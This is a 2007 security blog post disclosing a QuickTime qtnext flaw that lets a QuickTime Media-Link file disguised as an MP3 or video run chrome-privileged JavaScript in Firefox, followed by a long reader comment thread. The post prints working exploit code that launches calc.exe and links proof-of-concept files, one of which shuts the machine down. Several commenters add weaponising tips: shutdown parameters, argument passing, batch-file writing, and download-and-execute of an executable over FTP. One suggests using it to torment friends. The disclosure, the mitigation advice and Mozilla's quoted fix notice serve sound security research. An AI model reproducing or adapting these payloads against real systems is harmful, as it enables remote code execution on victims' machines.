0DAY QuickTime pwns Firefox

Wed, 12 Sep 2007 12:05:53 GMT

It seams that QuickTime media formats can cause Firefox to misbehave. The result of this vulnerability can lead to full compromise of the browser.

Before we move on, I have to say a few things. Last year I disclosed two QuickTime vulnerabilities here and here. The first vulnerability was fixed but the second one was completely ignored. I tried to bring the spot light on the second vulnerability one more time over here without much of success. So, I decided to post a demonstration of how a Low risk issue can be turned into a very easy to perform HIGH risk attack when technology change.

The exploit is rather simple. But first, here is a simple QTL file which instructs the browser to display a friendly alert('whats up...') message on the screen:

<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="presentation.mov" autoplay="true" qtnext="javascript:alert('whats up...')"/>

The most interesting thing about this simple XML file is that we can save it with QuickTime supported extension in order to mislead the user. If you check about:plugins under Firefox, you will see that QuickTime supports several media formats. We can use the audio and video formats only. This means that you can paste the above code into files with extensions: 3g2, 3gp, 3gp2, 3gpp, AMR, aac, adts, aif, aifc, aiff, amc, au, avi, bwf, caf, cdda, cel, flc, fli, gsm, m15, m1a, m1s, m1v, m2a, m4a, m4b, m4p, m4v, m75, mac, mov, mp2, mp3, mp4, mpa, mpeg, mpg, mpm, mpv, mqv, pct, pic, pict, png, pnt, pntg, qcp, qt, qti, qtif, rgb, rts, rtsp, sdp, sdv, sgi, snd, ulw, vfw, wav and others.

Enough theory, let's see some action. For more information, just read this blog post. The exploit that gains chrome privileges looks like this:

<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\\windows\\system32\\calc.exe');process=Components.classes['@mozilla.org/process/util;1'].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(true,[],0);void(0);"/>

In practice I can do anything with the browser. However, just for the sake of this demonstration, I simply open calc.exe.

If you dare to try this in your browser, here is a list of a few files you have to click on. They are not malicious. You have my word: qt-poc-01.mp3, qt-poc-02-shutdown-dont-click.mp3, qt-poc-03.mpeg, qt-poc-04.mov, qt-poc-05.avi.

BTW, QuickTime comes by default with iTunes. Therefore, iTunes users are most affected, I believe.

reznrezn
nice one, pdp. i am curious - did you ever formally submit this to apple security beyond posting on your blog?
tenesttenest
wow... /me's jaw drops i thought for sure that I would be safe since I have never installed quicktime and instead use quicktime alternative (http://www.codecguide.com/download_qt.htm), but alas, these exploits work even against quicktime alternative.... very nice find...
Gareth HeyesGareth Heyes
My question is why did you wait so long? Apple are useless, the only way to get them to do anything is to make it public. They either don't acknowledge vulnerabilities or deny there is even a problem. I suggest changing your wait time to about 1 month.
pagvacpagvac
Nice one dude. Screw overflows, who needs them when you can do things like this with JS.
HubertHubert
Doesn't work with Quicktime 6.5 and Firefox 2.0.0.6. The browser window just shows a broken QT icon. Is my QT too old?
GaleazziGaleazzi
this is the stuff we like : ) very good job pdp
Simon ZerafaSimon Zerafa
Hi, Well this is a very good Quicktime exploit however it works in IE7 as well as FF 2.0.0.6 Why so hard on FF? It seems to be a issue with QT not any specific browser. Kind Regards Simon
mikmik
Firefox 2.0.0.6 and 3.0 are vulnerable.
Aks aka oknockAks aka oknock
Good shot pdp. thats really good.
mwoodmwood
POPS IE
http://-chrome%20javascript:file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c://windows//system32//calc.exe');process=Components.classes['@mozilla.org/process/util;1'].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(true,[],0);void(0);
blahblah
Javascript doesn't work for me using mplayer plugin to handle quicktime. --- QuickTime Plug-in 6.0 / 7 File name: mplayerplug-in-qt.so mplayerplug-in 3.31 Video Player Plug-in for QuickTime, RealPlayer and Windows Media Player streams using MPlayer JavaScript Enabled and Using GTK2 Widgets
pdppdp
Simon, yes it is not Firefox specific. It works for IE as well, although the impact is less critical I must say. This is due to the tightened security policies IE implements for local zone scripts.
Tonu SamuelTonu Samuel
I wonder if Googlebot accesses this "qt-poc-02-shutdown-dont-click.mp3" link does it also shuts google down or bot only? lol :)
31d131d1
Yeah, googlebot would definitely open that in quicktime while running Firefox.
JeffJeff
Not one of these links actually worked on my XP machine, using Opera. This is not a bug in Quicktime, its shitty browsers. You can't seriously suggest that a media play mechanism should decide which URLs are safe and which are not - that is 100% the problem of the browser.
Giorgio MaoneGiorgio Maone
Gecko browsers + NoScript are immune, no matter if the attacker site is whitelisted or not.
XinstictXinstict
Great work! Little note, this to work Firefox must be default browser.
tequeteque
Nice disco pdp, qt-poc-02-shutdown-dont-click.mp3 link didn't work on my box until i added parameter -s to pass in 2nd to last js statement ... process.run(true,['-s'],1);void(0);
jinxpuppyjinxpuppy
nice!
JulesLtJulesLt
Tested on OS X. By default Quicktime opens the links in Safari, even if this page is opened in Firefox. You need to set default browser to FF also. Having done so, clicking on links presents a cross-site scripting warning from FF, that the script you are running may be trying to trick you. Accepting this gives a file not found from Mozilla - possibly they gave taken something down?? I really wanted to see if the native protection against installed software would kick in, or be bypassed. That said, it doesn't matter if OS X is protected, given that most Quicktime installs are on Windows XP boxes running iTunes.
XinstictXinstict
Is it possible to run "directly" like file.initWithPath('c:\\windows\\system32\\cmd.exe /c echo x & run notepad.exe & etc')? I'm not sure if it can be done but would be much easier to execute code without writing 'firefox backdoors' in 'chrome zone'...
bugstomperbugstomper
Firefox 2.0.0.6 under MacOS 10.4.10, the links result in an alert saying You are attempting to login to site mozilla.org with username chrome%20javascript but the site does not require authentication. Ths may be an attempt to trick you. Is that the site you really want to visit? (I'm paraphrasing the alert warning from memory) Even if I do click Yes on that alert then Firefox tries to open a URL on http://mozilla.org, not a local file or chrome type URL or whatever you are trying to do as an exploit, and all that results is a 404 file not found. So it appears that Firefox on the Mac is not vulnerable to this after all.
dbacondbacon
It doesn't work if you have Quicktime alternative installed.
cloroxclorox
nice pdp
HawkuletzHawkuletz
Doesn't work on my Mac (Mac OS 10.4.10, Firefox 2.0.0.6 and Quicktime 7.2) So crossplatform exploits are not yet feasible.
chrischris
I created a file with you POC code in it, named it test.html and opened it in Windows and it didn't do anything. I put in a real mp3 file named a.mp3 and all it did was play the song yet when I click on your links it works fine. Am I missing something?
CrolweyCrolwey
The exploits does not work if you have installed the NoScript extension, even if you allow JavaScript for gnucitizen.org. The exploits do work, of course, if you allow all sites to use JavaScript, i.e. deactivate NoScript.
BkBk
interestingly, when you try these exploits in Firefox on a Macbook Pro, it launches Safari, and pops up Mozilla.org 404 page. the exploits did not work for me on a XP2 system, even after disabling noscript. but I am using a limited user account, so maybe that makes a diff?
BkBk
i also tried the exploit in an Windows XP SP2 system using IE7, and it did not work. but again, I was testing using a limited user account, though I don't know if that makes any difference
davedave
Well I've just tried it in a VMWare XP machine, with both firefox, IE7 and Opera clean installs. The exploit started calc.exe on all platforms. Very worrying.
XinstictXinstict
To exploit this on IE, firefox must be installed too. IE spawns
x:\program files\mozilla firefox\firefox.exe -chrome javascript:file=Components.classes...
like all other browsers do [K-Meleon,Opera..]
Sp0oKeRSp0oKeR
Awsome Job!!!! Actually it's easy to exploit this stuffs =)!! Regards Sp0oKeR
eracceracc
Looks to me like this is a Microsoft Windows only problem (yet again). Firefox 2.0.0.6 with various Quicktime players on Linux does not do anything. Maybe you should try to do something that is Linux specific here. Of course the bottom line is only the truly ignorant (sadly this means many Microsoft Windows users) and morons browse the net as an administrator user.
Chitiga GeorgesChitiga Georges
I`ve tested the exploit and works on firefox and ie6, on ie7 i get a "error on page"
BkBk
so short of uninstalling QT, what can users do to protect themselves from this particular sploit?
pdppdp
I would recommend to install NoScript if you are a Firefox user and switch to Firefox with NoScript if you use any other browser. When a fix is available, restore your settings.
ntbnntntbnnt
hmmm... doesn't work on my linux or windows boxes... i tried running the tests here with latest stable firefox and quicktime...
0ole0ole
Same here ntbnnt. Doesn't works on Mac too.
BCBC
It works here, it is quite intresting. Notepad Calculator Paint...shell.
RonaldRonald
Good find PDP, very nice research. I was aiming at the same stuff in my new BrowserFry platform, aiming to be an aid in this kind of research.
anonanon
tee hee... all your demo links just open up an "Enter name of file to save to" dialog box for me :-p
randomrandom
This isnt fair to us linux users. I tried to get all of your links to work but they just failed. Mplayer's plugin wouldnt let it through and then apparmor wont allow firefox to execute any applications. Any one have any suggestions? I have firefox...
NukesNukes
Did this Exploit works in QuickTime 7.2? I have tested it here and didn't work :(. see ya
ntbnntntbnnt
Well, I am getting to a quicktime plugin prompt, the little media bar and of course play does absolutely nothing. very strange, not quite sure what the difference in the boxes that do it and the boxes that don't.... pdp, any ideas about what hardware/additional software would make one more vunerable... I'll keep looking into this...
2rzn2rzn
Did not work here. My firefox runs under Xp, and its configured to automatically ask to download files like mp3, mov, avi etc. Its not allowed to automatically launch the player. Seems that that avoids the problem.
SnapSnap
it doesnt work here i have tried in FF and IE with the last version of QuickTime
grigsgrigs
how is it possible to pass multiple parameters to the cmd? Or does someone know where to reade about the xml file.. how it is structured and what way you can wright to the CMD ? thanks grigs
hnZ^hnZ^
process.run(true,['/parmaeter1'],['/parameter2'],2) (2=arg lenght)
and use some utf8 encoder if you have long parameters. I still havent managed to get this to write a .bat.
process.run(true,['/c > script.txt echo hello'],1)
didn't work as supposed. I also tried the javascript used by pocs for the old firelinking bug (http://www.mikx.de/firelinking/), but I didn't get that to work neither.
BrandonBrandon
All these do are throw an error and then open IE, here, the lot of them. FireFox 2.0.0.6, QuickTime 7.2.
l.phoenixl.phoenix
I think this vulnerability could be used for install trojan and backdoor. It simplify does this by attach a binary file with javascript code, write it to local file and exec it. So be aware with every media link you click on FF until Mozilla fixes it on FF 2.0.0.7!
Josh DavisJosh Davis
I really wished that would have worked. Apparently I need quicktime and Windows for this to work? I clicked all the links and my BSD box failed to shutdown or do anything remotely cool.
ramoramo
doesn't work, although a dll athenticator noted that a new connection locally intiated is attempting to connectto some unknown website. anywho, doesn't work
wilfredwilfred
no problems @ ubuntu linux :-)
joejoe
yay firefox 2.0.0.7 has been released! I feel safe again :)
AHAH
Haha, Firefox 2.0.0.7 out that now blocks the -chrome exploit. You never see that kind of turnaround with Microsoft.
Jake CasperJake Casper
This is too many critical alerts in 1 year. I see from the comments here IE isn't affected. Time to make the switch back to what works people. Jake
chaoskaizerchaoskaizer
thanks for the news, this is one of the most hostile Firefox vulnerabilities.
danierudanieru
wow, incredible finding, pdp! tested bug on the following: Mozilla/5.0 (Windows; U; Windows NT 6.0; es-AR; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7 NoScript 1.1.7.2 ...did not work, i'm on vista64. it still does recognize the script call tho, but it kinda does not find it lulz. all it says: "cannot find 'allwholecommandline'. please verify the web or local path are correct"
pdppdp
danieru, interesting!!!
XinstictXinstict
here is code.exec example since this vuln. is patched now.. This example connects to local ftp with username x and pass x, downloads t.exe and executes it.
ChrisChris
My 2.0.0.7 crashes opening qt-poc-02-shutdown-dont-click.mp3...
RedRed
LOL danieru! The firefox 2.0.0.7 that you have installed (im sure it was approx. on the 19th of september) IS issued to close the QT hole!!!! No matter if it`s vista64 or not!
yksoft1yksoft1
Seems Firefox 1.5.0.11 is affected but just pop a messagebox that says IE cannot find URL "Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\\windows\\system32\\calc.exe');process=Components.classes['@mozilla.org/process/util;1" and a blank IE Window popped out.
Thor LarholmThor Larholm
Firefox 2.0.0.7 takes care of this attack vector, so here are some notes about using qtnext with Internet Explorer: http://larholm.com/2007/09/19/quicktime-qtnext-0day-for-ie/
SUMGUYSUMGUY
What is the Remote File Download & Execute code for this Exploit..??
NonCentsNonCents
This is a beautiful little hack, and used in conjunction with another - http://www.metacafe.com/watch/705792/windows_dirty_trick/ you can absolutely torture anyone... Do this to a friend to make, whatever you want happen whenever they visit... any site (if your truly evil set it to their home page)
MarcelloMarcello
Windows 2000 SP4 (5.00.2195) Firefox 2.0.0.7 QuickTime player 7.1.6 Clicking on any of the supposed exploit-link I obtain a new Firefox window, and the javascript error console shows something like this: Error: uncaught exception: [Exception... "Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIStringBundle.GetStringFromName]" nsresult: "0x80004005 (NS_ERROR_FAILURE)" location: "JS frame :: chrome://vrs/content/vrsOverlay.js :: :: line 55" data: no]
AndreasAndreas
Firefox 2.0.0.7 has fixed this issue specifically: (excerpt from the problem report at http://www.mozilla.org/security/announce/2007/mfsa2007-28.html) "On his blog Petko D. Petkov reported that QuickTime Media-Link files contain a qtnext attribute that could be used on Windows systems to launch the default browser with arbitrary command-line options. When the default browser is Firefox 2.0.0.6 or earlier use of the -chrome option allowed a remote attacker to run script commands with the full privileges of the user. This could be used to install malware, steal local data, or otherwise corrupt the victim's computer." [...] "To protect Firefox users from this problem we have now eliminated the ability to run arbitrary script from the command-line. Other command-line options remain, however, and QuickTime Media-link files could still be used to annoy users with popup windows and dialogs until this issue is fixed in QuickTime. This QuickTime issue appears to be the one described by CVE-2006-4965 but the fix Apple applied in QuickTime 7.1.5 does not prevent this version of the problem."
Ano20070922Ano20070922
Notes to several other comment posters: 1. This exploit only works if Firefox is the default browser. It doesn't matter what browser you use, only the default browser matters for this one. 2. The example exploits on this page use the security hole to launch some programs that are part of Windows. To test the exploits on Mac, Linux, BSD etc. you would need to change those strings in the exploits to name programs from those systems. 3. Firefox 2.0.0.7 removed the command line option used by these exploits. 4. The real issue is that when QuickTime sees a URL inside a movie or song, it passes the url text to the command line of whatever is the default browser in a way which allows passing arbitrary text to the browser command line. In the old Firefox 2.0.0.6 browser this allowed access to the -chrome option. But any browser whose command line parser can be tricked into doing dangerous stuff from nonsense URLs can be exploited. 5. Firefox 2.0.0.7 is just a stopgap workaround for the specific exploits on this page. The real issue is that the generic "open default browser" action in the operating system and class libraries needs to ensure that whatever is passed on to the browser process is a single argument which does not look like an option or contains spaces or shell metacharacters. I don't have the Quicktime source code, so I don't know which interface they use to pass the qtnext string to the browser. But I am certain that the strings found in the exploits should not have made it through the kind of basic security sanitation filters recommended in GNU/UNIX secure programming tutorials for decades.
trustmetrustme
Well. As of Sept 14th Symantec has this included in their AV defs as Bloodhound.Exploit.161 Nice work on the exploit.
jeje
This was fixed with the release of version 2.0.0.7, though.
OldboyOldboy
Real through this vulnerability to load exe through the URL?
Francoise MAHENCFrancoise MAHENC
What do I do now? One week ago, I got a Trojan, my Word documents were erratic, the Firewall antivirus detected nothing..MS were of no help beyond checking that my softwares were legal. I first got a paid Plus version of my AdAware, which promptly got erratic too, but detected and deleted a MRU. After I had tried to watch a YouTube [professional] video, I had noticed a QT icone come out of nowhere [my son installed iTunes on my laptop, which I never use - and Yes, I browse as an administrator, not knowing any better]. After AdAware, I also switched to Firefox, feeling fed-up with MS generally, and from checking on NoScript, I now got on your QT bug page - it tallies. WHAT DO I DO NOW? I guess this is of no interest to you [except as further proof on Windows users being morons!]but please direct me to people who can answer me: you are the only source of clear information I could get till now. Sorry to bother you, thank you for your activity - and thank you in advance if you can direct me. Francoise Mahenc
AssyrenAssyren
I'm using Windows XP sp2 IE but it's not working the song 1.mp3 is runing but the calc.exe is not working i use this code what should i change so it will work ? thanx
pissedoff?pissedoff?
your beyonce is not malicious?what about this received by AV?: Threat: Bloodhound.Exploit.161
tapasmantapasman
sweet so none of these execute on my system,*shaking fist ala Homer* unless you have something hidden. thanks for the info and sorry you did not get credit for it. I know how you feel I have discovered close to 10 new unknown virueses and hacks and got no credit, oh well atleast my co-workers know.
tapasmantapasman
opps IE 6 and QT 6.0
sachinKTsachinKT
i dont know but some hacks are not working...
radioxidradioxid
The alert doesn't work anymore on FF 20013...